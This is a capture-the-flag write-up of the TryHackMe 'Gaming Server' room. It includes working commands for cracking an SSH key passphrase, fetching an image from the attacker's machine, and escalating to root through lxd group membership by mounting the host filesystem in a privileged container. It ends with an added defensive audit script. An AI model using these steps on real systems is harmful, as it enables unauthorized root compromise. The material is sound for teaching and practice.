Hey guys! In this write-up we will go through the Gaming Server room on TryHackMe.
It is an easy room and we have to find the user.txt and the root.txt in order to complete it.
$ nmap -A -T4 -p- -vv -oN Ascan <Target IP>
$ cat Ascan | grep tcp
22/tcp open ssh syn-ack OpenSSH 7.6p1
80/tcp open http syn-ack Apache httpd 2.4.29
Ok, we have only 2 services:
SSH on port 22
HTTP on port 80
Start gobuster and take a look at the HTTP service:
$ gobuster dir -w /usr/share/wordlists/dirbuster/dirmedium.txt -u <Target IP> -t40
Clicking around the website doesn't turn up anything useful, but the homepage source contains a comment that reveals a possible username.
From the gobuster we retrieve some useful resources:
$ gobuster dir -w /usr/share/wordlists/dirbuster/dirmedium.txt -u <Target IP> -t40
/uploads (Status: 301)
/secret (Status: 301)
/server-status (Status: 403)
Let’s take a look at uploads and secret.
Inside uploads we have something that looks like a dictionary; we definitely have to grab it, it could be useful. The manifesto and the meme don't seem to be interesting.
$ wget http://<Target IP>/uploads/dict.lst
Bingo! Inside the secret folder we have a private key, grab it on your attack machine!
$ wget http://<Target IP>/secret/secretKey
Maybe we can log in to the SSH service. In order to use the private key as an identity file, we first have to restrict its permissions (ssh refuses keys that are readable by others):
$ chmod 400 secretKey
$ ssh -i secretKey john@<Target IP>
Unfortunately, we can't log in because the key is protected by a passphrase. This should not be a problem: maybe we can use John the Ripper with the dictionary found inside the uploads folder to crack it. Let's check.
$ python /usr/share/john/ssh2john.py secretKey > sec.hash
$ john --wordlist=dict.lst sec.hash
Thank you John! Now we can log in! Hello there!
Once inside, let's check what we have and what we can do.
Inside john's home directory there is the user flag.
john@exploitable:~$ ls
user.txt
Let’s get the root now.
john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
As we can see, john is in the lxd group. We can use this to escalate our privileges, since a member of lxd can create a privileged container and mount the host filesystem inside it. To learn more, I suggest you read this post from Hacking Articles.
Let's do it. On our attack machine let's build an Alpine image to import, then start an HTTP server so we can wget it from the target machine:
$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ ./build-alpine
$ python3 -m http.server
Let's go back to the target machine (python3's http.server listens on port 8000 by default):
john@exploitable:~$ cd /tmp
john@exploitable:/tmp$ wget http://<Your IP>:8000/imagefilename.tar.gz
Now import the image, then check that it is listed:
john@exploitable:/tmp$ lxc image import ./imagefilename.tar.gz --alias myimage
john@exploitable:/tmp$ lxc image list
And it’s there! Awesome.
john@exploitable:/tmp$ lxc init myimage ignite -c security.privileged=true
john@exploitable:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
john@exploitable:/tmp$ lxc start ignite
john@exploitable:/tmp$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ #
To grab root.txt we have to go to the host's /root, which is now mounted at /mnt/root/root inside the container:
~ # cd /mnt/root/root
/mnt/root/root # ls
root.txt
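As a defender-side check, added here and not part of the original write-up, this small POSIX shell audit flags the two weaknesses this box chains together: a private key served from a web directory and an interactive user in the lxd group. The group file and web root it inspects are constructed samples that mirror the box; point GROUPFILE and WEBROOT at real paths to run it on a host.

```shell
#!/bin/sh
# Added audit helper (not part of the write-up). Flags:
#   1. files under a web root that start with a PEM private-key header
#   2. members of the lxd group (root-equivalent on a host running LXD)

# Print members of a group, one per line, from an /etc/group-style file.
# Usage: group_members <group-name> <group-file>
group_members() {
  awk -F: -v g="$1" '$1 == g {
    n = split($4, u, ",")
    for (i = 1; i <= n; i++) if (u[i] != "") print u[i]
  }' "$2"
}

# Print files under a directory whose first line is a PEM private-key header.
# Usage: exposed_private_keys <dir>
exposed_private_keys() {
  find "$1" -type f | while read -r f; do
    if head -n 1 "$f" | grep -q '^-----BEGIN .*PRIVATE KEY-----$'; then
      echo "$f"
    fi
  done
}

# ---- constructed sample data (mirrors the box; no real key material) ----
SAMPLE_DIR=$(mktemp -d)
GROUPFILE="$SAMPLE_DIR/group"
WEBROOT="$SAMPLE_DIR/www"
mkdir -p "$WEBROOT/secret" "$WEBROOT/uploads"
cat > "$GROUPFILE" <<'EOF'
root:x:0:
sudo:x:27:john
lxd:x:108:john
www-data:x:33:
EOF
printf '%s\n%s\n' '-----BEGIN RSA PRIVATE KEY-----' '[placeholder, not a real key]' \
  > "$WEBROOT/secret/secretKey"
printf 'password\n123456\n' > "$WEBROOT/uploads/dict.lst"

# ---- report ----
for u in $(group_members lxd "$GROUPFILE"); do
  echo "WARN: user '$u' is in group lxd (can mount host / inside a privileged container)"
done
for f in $(exposed_private_keys "$WEBROOT"); do
  echo "WARN: private key served from web root: $f"
done
```

On a real host the lxd finding is fixed by removing the user from the group (or not installing LXD where it is not needed), and the key finding by removing the file from the web root and rotating the key.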
Very straightforward, easy box. I've already found this kind of privesc in another room, and I think the whole container universe is very interesting for these purposes.
Hope someone finds this useful and enjoyable.